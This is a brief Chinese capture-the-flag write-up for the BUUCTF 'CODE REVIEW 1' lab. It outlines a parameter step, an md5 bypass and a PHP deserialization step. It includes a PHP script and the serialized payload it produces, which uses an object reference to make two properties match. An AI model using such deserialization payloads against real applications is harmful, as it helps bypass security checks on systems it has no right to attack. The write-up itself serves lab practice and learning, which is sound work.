BUUCTF-CODE REVIEW 1(代码审计)


  0、打开靶机后,是php源码

  1、第一层是GET,POST传参
  2、第二层md5绕过
  3、第三层是php反序列

 1 <?php
 2 class BUU{
 3     public $correct="";
 4     public $input="";
 5 }
 6 
 7 $obj= new BUU;
 8 $obj->input=&$obj->correct;
 9 echo serialize($obj);
10 ?>

  得到的字符串:

  O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

  4、放postman。


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM